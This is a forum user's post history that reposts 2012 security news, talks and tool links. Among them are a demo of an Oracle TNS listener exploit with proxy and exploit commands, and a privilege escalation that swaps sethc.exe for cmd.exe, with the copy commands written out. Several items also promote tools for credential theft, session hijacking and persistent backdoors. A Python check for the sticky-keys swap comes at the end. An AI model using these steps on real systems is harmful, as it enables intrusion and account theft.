Everything posted by Nytro

  1. Security Week In Review, April 23-27

     Infections and exploits plagued this week in security, affecting everything from the Mac OS X to Oracle database servers. High profile leaks and a passage of a controversial information sharing bill also graced the security landscape. Here’s a look at April 23-27.

     VMware Source Code Leaked: Last week, VMware confirmed an attack that led to the online publication of source code for its ESX hypervisor and said that more could be on the way. The individual stepping up to take credit for the attack was a hacker going by the handle of Hardcore Charlie, who also claimed responsibility for another hack on military contractor China National Import & Export Corp earlier this month. “The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today,” said Iain Mulholland, director of the VMware Security Response Center, in a blog post. Hardcore Charlie also tweeted that he possessed EMC source code, which he said he also planned to post.

     Microsoft Fixes Hotmail Password Flaw: Redmond patched a password reset vulnerability in its Hotmail Web mail service last week that potentially exposed its more than 360 million users to account compromises. Specifically, the glitch enabled miscreants with a Firefox add-on to circumvent security restrictions and remotely reset the password of a Hotmail account by modifying the data, while also enabling them to decode CAPTCHA and send automated values over the MSL Live Hotmail module. When the reset button was hit, hackers could then manipulate the requests and put in their own reset information. Luckily for Hotmail’s 360 million users, the bug was discovered and repaired in a relatively short window of time. Microsoft got wind of the vulnerability April 20 and issued a fix the following day. The fix went public at the end of last week.

     House Passes CISPA Bill: The controversial Cyber Information Sharing and Protection Act passed in the House of Representatives by a vote of 248 to 168 at the end of last week, despite a strong public backlash from privacy advocates and academia who asserted that the move violated privacy rights. Specifically, the bill, supported by firms such as Facebook, financial trade associations, AT&T, utilities, Intel, and several tech companies, among others, gives the federal government a lot of leeway to share classified cyber threat information with U.S. companies. The bill also simultaneously eliminates many restrictions to information sharing between organizations. The bill’s chief supporter and architect Mike Rogers applauded the legislation as a move in the right direction toward the comprehensive protection of U.S. networks against cyber spies and thieves from Russia and China. However, CISPA’s opponents, including the Center for Democracy and Technology, as well as the ACLU, called the bill ‘overly broad’ and contended that it would serve to erode users’ Internet freedoms and privacy.

     Oracle Suffers Critical Glitch: A critical vulnerability enabling remote code execution in all versions of the Oracle database server remains unpatched even after Oracle attempted to fix the flaw with its April Critical Patch Update, according to reports circulating last week. Specifically, the vulnerability, occurring in the TNS Listener service, a function which routes connection requests from clients to the server, allows attackers to intercept server traffic and execute malicious commands on the system. The vulnerability exists in all Oracle versions, affecting customers using 8i, 9i, 10g, and 11g (11g R2). If exploited, a remote attacker has complete control of the data exchanged between the server database and the client machines, which paves the way for miscreants to hijack users’ sessions and inject code to do their malicious bidding. Oracle recently patched the flaw in the TNS Listener service in its April update. However, it turns out that the fix didn’t apply to current versions of the Oracle database, leaving many customers subject to arbitrary attacks aiming to exploit the vulnerability.

     New Flashback Variant Attacks Macs: Yet another Flashback variant was discovered sweeping through users’ Mac OS X machines last week. This time, Mac security firm Intego reported the pesky Mac malware installs on users’ computers without requiring a password. The latest Flashback version, known as Flashback.S, inserts itself in one of the user’s home folders that include ~/Library/LaunchAgents/com.java.update.plist or ~/.jupdate. Once it has completely installed itself, the malware then deletes all files and folders in ~/Library/Caches/Java/cache in order to eliminate the applet from the infected Mac, and avoid detection or sample recovery, according to Intego. The Mac-focused Flashback Trojan was first discovered in September 2011, impersonating a bogus Adobe Flash Player installer. The malware has since gone on a rampage against the Mac OS X platform with numerous variants that have exploited a slew of Java vulnerabilities, ultimately infecting as many as 650,000 machines, according to reports.

     by Stefanie Hoffman | April 30, 2012 at 5:05 pm
     Sursa: Security Week In Review, April 23-27 | Fortinet Security Blog
  2. Fun stuff

  3. CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

     Timeline:
     Vulnerability discovered by Joxean Koret in 2008
     Vulnerability reported to the vendor by Joxean Koret in 2008
     Public release of the vulnerability in Oracle CPU by the vendor on 2012-04-17
     Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18
     Fake patching of the vulnerability discovered by Joxean Koret on 2012-04-26

     PoC provided by: Joxean Koret

     Reference(s):
     Oracle CPU of April 2012
     Joxean Koret details and PoC
     CVE-2012-1675
     Oracle Security Alert for CVE-2012-1675

     Affected version(s): All versions of Oracle Database

     Tested with: Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

     Description:
     Usage of Joxean Koret PoC requires that the database name has a length of 6 characters.

     Database server characteristics:
     IP: 192.168.178.150
     Oracle version: 10.2.0.4.0
     Database listener port: 1521
     Database listener has no client IP restrictions
     Database name: arcsig
     Database username: arcsig
     Database password: testtest

     Database client characteristics:
     IP: 192.168.178.151
     SQL*Plus version: 10.2.0.4.0
     "tnsnames.ora" file as below:
       TARGET.DB=
         (DESCRIPTION =
           (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
           (CONNECT_DATA = (SERVICE_NAME= arcsig))
         )

     Attacker characteristics:
     IP: 192.168.178.100
     Usage of PoC provided by Joxean Koret

     Demonstration:

     PoC validation phase
     On database server:
       ifconfig
       ps faux
       netstat -tan
     On database client:
       ifconfig
       sqlplus -v
       cat tnsnames.ora
       sqlplus arcsig@TARGET.DB
       HELP
       QUIT

     PoC exploitation phase
     On attacker:
     Start the MITM proxy, which will intercept the communication between the client and the database:
       sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521
     Start the vulnerability exploitation:
       python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521
     On the database client:
     Connect with SQL*Plus:
       sqlplus arcsig@TARGET.DB
       ?
       ? INDEX
       TOTO
       QUIT
     You can see that the communications are intercepted by the proxy.

     Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration
  4. Facebook source code hacker explains what really happened!

     Software development student Glenn Mangham, 26, was freed earlier this month after appeal judges halved the eight-month prison sentence he was given for infiltrating and nearly bringing down the multi-million-dollar site. Glenn Mangham, of York, England, posted a lengthy writeup on his blog and a video, saying that he accepts full responsibility for his actions and that he did not think through the potential ramifications.

     "Strictly speaking what I did broke the law because at the time and subsequently it was not authorised," Mangham wrote. "I was working under the premise that sometimes it is better to seek forgiveness than to ask permission."

     Initially convicted to 8 months in prison, the Court of Appeal in London decided that there weren’t any ill intentions on the hacker’s behalf, the judges deciding not only to release him, but also to allow him to use the Internet once again. After criticizing the CSO for attacking him while he was locked up, Mangham explained in detail why he took the Facebook source code, why he didn’t use any proxies to cover up his tracks, and he even revealed the exact amount of damage he believed his actions had caused.

     http://www.youtube.com/watch?v=emzOZH1-v9E&feature=player_embedded
  5. Linux Memory Images

     We make these sample Linux memory images available in the hope they may be useful for research, training, testing, or other purposes. If you find them to be of value, please drop us a line via the contact form on this web site.

     Filename: centos-5.6-i386-kbeast.mem.bz2
     Size: 705266494 bytes (673MB)
     Hash: sha256sum
     Description: This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 2GB RAM, running from a CentOS 5.6 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.
     BitTorrent Download: Magnet Link

     Filename: ubuntu-10.04-i386-kbeast.mem.bz2
     Size: 480042093 bytes (458MB)
     Hash: sha256sum
     Description: This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 1GB RAM, running from an Ubuntu 10.04.3 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.
     BitTorrent Download: Magnet Link

     Sursa: Second Look
  6. An interesting case of Mac OSX malware

     msft-mmpc 30 Apr 2012 4:20 PM

     In June 2009, Microsoft issued security update MS09-027, which fixed a remote code execution vulnerability in the Mac version of Microsoft Office. Despite the availability of the bulletin (and the passage of time), not every machine is up to date yet – which is how, nearly three years later, malware has emerged that exploits the issue on machines running Office on Mac OS X. Fortunately, our data indicates that this malware is not widespread, but during our investigation we found a few interesting facts we’d like to share with you.

     For our investigation, we used a malware sample (SHA1: 445959611bc2480357057664bb597c803a349386) that is detected as Exploit:MacOS_X/MS09-027.A.

     Figure 1 - Overall Execution Flow

     Firstly, the vulnerability is a stack-based buffer overflow - the attack code could corrupt variables and return addresses located on the stack. As we analyzed the malware, we found that the malware author managed to corrupt a local variable and used that corrupted variable to deploy 'stage 1' shellcode to a designated area. This corrupted variable is later used for a target address and is where the stage 1 shellcode is copied. The corrupted return address points to this target address as well. This target address is important, as, with Snow Leopard, we could confirm that it was used to exploit a specific location on the heap that is writable and also executable. The point is, that with Lion, that specific memory address can't be written, so the exploit fails. We can assume that this malware itself is targeting only Snow Leopard or lower versions of Mac OSX. That means the attacker had knowledge about the target environment beforehand. That includes the target operating system, application patch levels, etc.

     Figure 2 - Stage 1 Shellcode

     This stage 1 shellcode leads to stage 2 shellcode, which is located in memory. The stage 2 shellcode is actually where the infection of the system occurs. The stage 2 shellcode creates three files:
       /tmp/launch-hs
       /tmp/launch-hse
       /tmp/file.doc

     Figure 3 - File Creation by Stage 2 Shellcode

     As you can see from the above picture, the exploit attack code uses typical Unix style shellcode to run system calls. So far, this is nothing new. Later in the shellcode, the file "/tmp/launch-hs" is executed by a system call to "execve" to execute commands. The contents of "/tmp/launch-hs" should be a shell script or executable.

     Figure 4 - Execution of /tmp/launch-hs script file

     We looked into the contents of "/tmp/launch-hs", and it appears like the following:

     Figure 5 - /tmp/launch-hs script contents

     It is just a tiny shell script that runs "/tmp/launch-hs" and opens "/tmp/file.doc". The file "/tmp/launch-hse" should be the main binary that contains all the malicious code. Also "/tmp/file.doc" is a fake document file that will be displayed to the user to deceive the user from seeing any abnormalities or malicious symptoms.

     The main payload file is "/tmp/launch-hse" - it is a Mach-O format, or standard executable format, for Mac OSX. This binary is a command and control (C&C) agent that communicates with a C&C server (master) to perform unauthorized actions that are similar to other C&C bot clients. The function names give clues that might indicate that this binary is connecting to a C&C server, parses commands from it and performs file retrieval or creates processes.

     Figure 6 - Peek into the function names gives you an idea.

     The main difference about this malware is that it is written for Mac OSX. For example, if you look into a "RunFile" function, which runs a command on the infected machine, you can see that it's a Mac OSX version of a backdoor. Basically it runs a command supplied from the C&C server.

     Figure 7 - RunFile function

     In conclusion, we can see that Mac OSX is not safe from malware. Statistically speaking, as this operating system gains in consumer usage, attacks on the platform will increase. Exploiting Mac OSX is not much different from other operating systems. Even though Mac OSX has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correlation with updating installed applications. If you're using Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac or Open XML File Format Converter for Mac, be sure to update using the latest product updates. For this specific vulnerability, you can visit the Microsoft Security Bulletin MS09-027 page and download the update.

     Jeong Wook (Matt) Oh
     MMPC

     Sursa: An interesting case of Mac OSX malware - Microsoft Malware Protection Center - Site Home - TechNet Blogs
  7. SIP home gateways under fire

     The SIP home gateway -- which combines a NAT router, a SIP proxy, and analogue phone adapters -- is the weakest link in a Voice over IP network. SIP's numerous source routing mechanisms share the well-known security weaknesses of IP source routing. The talk discusses possible exploits and countermeasures.

     Telephony is steadily moving to Voice over IP, opening up a world of hacking opportunities. While many security issues have long been addressed in standardization, real-world VoIP suffers from incomplete and sometimes broken implementations. SIP home gateways -- which combine a NAT router, a SIP proxy, and a phone adapter -- are especially at risk.

     The predominant VoIP protocol SIP (Session Initiation Protocol) has been designed as an -- almost -- stateless protocol. The network elements responsible for call routing only keep very little and short-lived state. This makes SIP highly scalable and substantially simplifies fail-over. To achieve this, SIP uses source routing mechanisms extensively. Due to its security weaknesses, the network layer protocols have long abandoned the idea of source routing, despite its theoretical appeal. Some IP source routing attacks and countermeasures can be applied to SIP.

     Authors: Wolfgang Beck
     Submitted: May 01, 2012

     Download: http://mirror.fem-net.de/CCC/27C3/mp3-audio-only/27c3-4181-en-sip_home_gateways_under_fire.mp3

     Sursa: IT Security and Hacking knowledge base - SecDocs
  8. Terrorists Win - Exploiting Telecommunications Data Retention

     Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes.

     In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks.

     Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack" problem, that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adopted strategies suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem.

     Authors: Kay Hamacher, Stefan Katzenbeisser
     Submitted: May 01, 2012

     Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4

     Sursa: IT Security and Hacking knowledge base - SecDocs
  9. Windows 8 Forensic Guide Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf
  10. SyScan 2012 Singapore

     Parent Directory
     Day1-1 Chris Valasek & Tarjei Mandt/
     Day1-2 Loukas Kalenderidis/
     Day1-3 Ryan MacArhur & Beist/
     Day1-4 Aaron LeMasters/
     Day1-5 James Burton/
     Day1-6 Jon Oberheide/
     Day2-10 Edgar Barbosa/
     Day2-6 Alex Ionescu/
     Day2-7 Stefan Esser/
     Day2-8 Brett Moore/
     Day2-9 Paul Craig/

     Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/
  11. Skype-iplookup

     Perform obscure IP lookup for online Skype accounts. Can find local and remote IP address. Requires cracked SkypeKit with deobfuscated debug logs.

     Online: http://skype-ip-finder.tk/
     Source code: https://github.com/zhovner/Skype-iplookup
  12. Announcing SSL Pulse

     April 30, 2012

     Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet.

     SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month’s results become available, we will start to show historic values and hopefully see improvements for each data point.

     So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation (8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis.

     The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults.

     Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites).

     As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application.

     Posted by Ivan Ristić at 16:36:44 in SSL, TIM
     Sursa: Ivan Ristić: Announcing SSL Pulse
  13. Oracle discloses new zero day exploit and launches JDK for OS X

     by Chester Wisniewski on May 1, 2012

     While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are an Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable.

     This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008, saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it? If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disable it entirely if it isn't needed in your environment.

     In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple.

     Update: At approximately the same time as this article was posted, Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant.

     Sursa: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security
  14. Privilege Escalation via "Sticky" Keys

     Monday, April 30, 2012

     This has been documented all over, but I like things to be on the blog so I can find them...

     You can gain a SYSTEM shell on an application you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and can change files.

     Make a copy somewhere of the original system sethc.exe:
       copy c:\windows\system32\sethc.exe c:\
       cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

     Copy cmd.exe into sethc.exe's place:
       copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
     or
       cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

     Reboot, hit the Shift key 5 times, a SYSTEM shell will pop up, do your thing. It would probably be nice to put sethc.exe back when you are done.

     Posted by CG at 12:10 PM
     Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys
  15. Arp/Dns Spoofing Steal Facebook Password (Lan Environment)

     Description: In this video I'll show you how an attacker can steal user credentials of every site (in this case it will be Facebook) in a LAN environment. First of all we use SET to clone the current Facebook home page and ...
     Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment)
     Follow Me: https://twitter.com/#!/SecObscurity

     Sursa: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)

  16. Stealing Http Sessions With Sessionlist

     Description: I run through a quick demo of how to use sessionlist to sniff HTTP session traffic. Following that I use a simple Firefox plugin to spoof the data acquired to show full access to the logged in user. Target demo site is facebook.com

     Download:

  17. Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.

     Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020).
     Victim: windows server 2006 x86 Enterprise Edition

     Sursa: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.

  18. Athcon 2011 Exploiting Anti-Reversing Techniques

     Description: AthCon IT Security Conference
     Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization.
     Speaker: Kyriakos Economou

     Sursa: Athcon 2011 Exploiting Anti-Reversing Techniques

  19. Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec

     Description: Athcon IT Security Conference
     Title: Win32 Exploit Development with pvefindaddr + Project Quebec
     Speaker: Peter Van Eeckhoutte

     Sursa: Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec

  20. Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"

     Description: "Attacking VoIP and understanding what cyber-crime is doing"

     Sursa: Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"

  21. Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"

     Description: "The DHCP Recession: Extended DHCP Exhausting attack"

     Sursa: Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"

  22. Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices

     Description: Mobile privacy: Tor on the iPhone and other unusual devices

     Sursa: Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices

  23. Microsoft Windows Eot Font Table Directory Integer Overflow.

     Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer.

     Sursa: Microsoft Windows Eot Font Table Directory Integer Overflow.

  24. Intersect Framework :: Install Persistent Backdoors

     Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files).
     Intersect homepage: http://github.com/ohdae/Intersect-2.5/

     Sursa: Intersect Framework :: Install Persistent Backdoors

  25. Social Engineer-Toolkit And Windows Credentials Editor

     Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett

     Sursa: Social Engineer-Toolkit And Windows Credentials Editor
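A defender-side check for the sethc.exe swap described in post 14, added here as an example and not code from the Carnal0wnage post: it flags sethc.exe being a byte-for-byte copy of cmd.exe, and the backup copy of the original that the post parks at the drive root. The directory layout is passed in as a parameter, and the sample tree with its file contents is a constructed assumption so the check runs anywhere.

```python
"""Detect the "sticky keys" swap: sethc.exe replaced by cmd.exe.

Added example (not from the post). Two artefacts of the procedure in post 14
are checked under a given Windows root:
  1. Windows\System32\sethc.exe has the same hash as Windows\System32\cmd.exe
  2. a stray copy of sethc.exe sits at the drive root (the backup the post makes)
"""
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_sticky_keys(root: str) -> list:
    """Return a list of findings for the Windows tree rooted at `root`.

    On a live system `root` would be something like "C:\\"; an empty list
    means neither artefact was found.
    """
    system32 = os.path.join(root, "Windows", "System32")
    sethc = os.path.join(system32, "sethc.exe")
    cmd = os.path.join(system32, "cmd.exe")
    findings = []
    if not (os.path.isfile(sethc) and os.path.isfile(cmd)):
        return ["sethc.exe or cmd.exe missing under System32; cannot compare"]
    # Artefact 1: after "copy /y cmd.exe sethc.exe" the two files are identical.
    if sha256_of(sethc) == sha256_of(cmd):
        findings.append("sethc.exe is identical to cmd.exe (replaced)")
    # Artefact 2: the post first copies the original sethc.exe to the drive root.
    stray = os.path.join(root, "sethc.exe")
    if os.path.isfile(stray):
        findings.append("stray copy of sethc.exe at drive root (backup left by the swap)")
    return findings


def build_sample_tree(swapped: bool) -> str:
    """Construct a fake Windows tree in a temp dir (contents are made-up bytes)."""
    root = tempfile.mkdtemp()
    system32 = os.path.join(root, "Windows", "System32")
    os.makedirs(system32)
    cmd_bytes = b"MZ constructed stand-in for cmd.exe"
    sethc_bytes = b"MZ constructed stand-in for sethc.exe"
    with open(os.path.join(system32, "cmd.exe"), "wb") as f:
        f.write(cmd_bytes)
    with open(os.path.join(system32, "sethc.exe"), "wb") as f:
        # A swapped tree has cmd.exe's bytes sitting where sethc.exe should be.
        f.write(cmd_bytes if swapped else sethc_bytes)
    if swapped:
        # ...and the original sethc.exe parked at the root, as in the post.
        with open(os.path.join(root, "sethc.exe"), "wb") as f:
            f.write(sethc_bytes)
    return root


if __name__ == "__main__":
    for swapped in (False, True):
        label = "swapped" if swapped else "clean"
        print(label, "->", check_sticky_keys(build_sample_tree(swapped)) or ["no findings"])
```

On a real host, point `check_sticky_keys` at the mounted Windows root; a hash match alone is enough to act on, since the two binaries should never be identical.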